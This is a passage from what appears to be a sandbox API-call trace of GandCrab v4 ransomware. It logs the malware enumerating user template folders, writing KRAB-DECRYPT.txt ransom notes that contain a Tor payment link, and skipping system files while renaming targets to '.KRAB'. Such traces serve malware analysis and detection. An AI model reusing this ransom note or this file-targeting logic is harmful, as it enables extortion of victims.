qeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.916] WriteFile (in: hFile=0x468, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.917] CloseHandle (hObject=0x468) returned 1 [0062.917] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.918] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.918] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0xa, wMilliseconds=0x78)) [0062.918] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.918] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.918] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.919] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a08d2ca4dee3d.lock") returned 120 [0062.919] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x468 [0062.920] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.920] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.921] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\") returned 97 [0062.921] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" [0062.921] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0xfbdfe0 [0062.921] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.921] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0062.921] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.921] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.921] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0062.921] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0062.921] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0062.921] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0062.921] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\" [0062.921] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.922] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.922] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.922] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.922] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.922] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.922] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.922] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\\\KRAB-DECRYPT.txt") returned 119 [0062.922] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0062.947] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.947] WriteFile (in: hFile=0x470, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338de20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338de20*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.948] CloseHandle (hObject=0x470) returned 1 [0062.948] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.948] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.949] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0xa, wMilliseconds=0x96)) [0062.949] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.949] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.949] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.949] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock") returned 125 [0062.950] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x470 [0062.950] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.951] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\") returned 102 [0062.951] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" [0062.951] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0xfbdae0 [0062.951] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.951] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0062.952] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.952] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.952] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0062.952] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.952] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.952] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock" [0062.952] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.952] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 130 [0062.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock") returned 125 [0062.952] lstrlenW (lpString=".lock") returned 5 [0062.952] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.953] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.953] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.953] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.953] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0062.953] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.953] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.953] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\KRAB-DECRYPT.txt" [0062.953] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.954] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\KRAB-DECRYPT.txt.KRAB") returned 123 [0062.954] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\KRAB-DECRYPT.txt") returned 118 [0062.954] lstrlenW (lpString=".txt") returned 4 [0062.954] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.954] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.954] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.955] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\KRAB-DECRYPT.txt") returned 118 [0062.955] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\KRAB-DECRYPT.txt") returned 118 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.955] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.955] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.955] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0062.955] lstrcmpW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2=".") returned 1 [0062.955] lstrcmpW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="..") returned 1 [0062.955] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03090430[[fn=Banded]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx" [0062.955] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.956] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx.KRAB") returned 135 [0062.956] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 130 [0062.956] lstrlenW (lpString=".thmx") returned 5 [0062.956] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.956] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0062.956] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.956] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 130 [0062.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 130 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="desktop.ini") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="autorun.inf") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="ntuser.dat") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="iconcache.db") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="bootsect.bak") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="boot.ini") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="ntuser.dat.log") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", 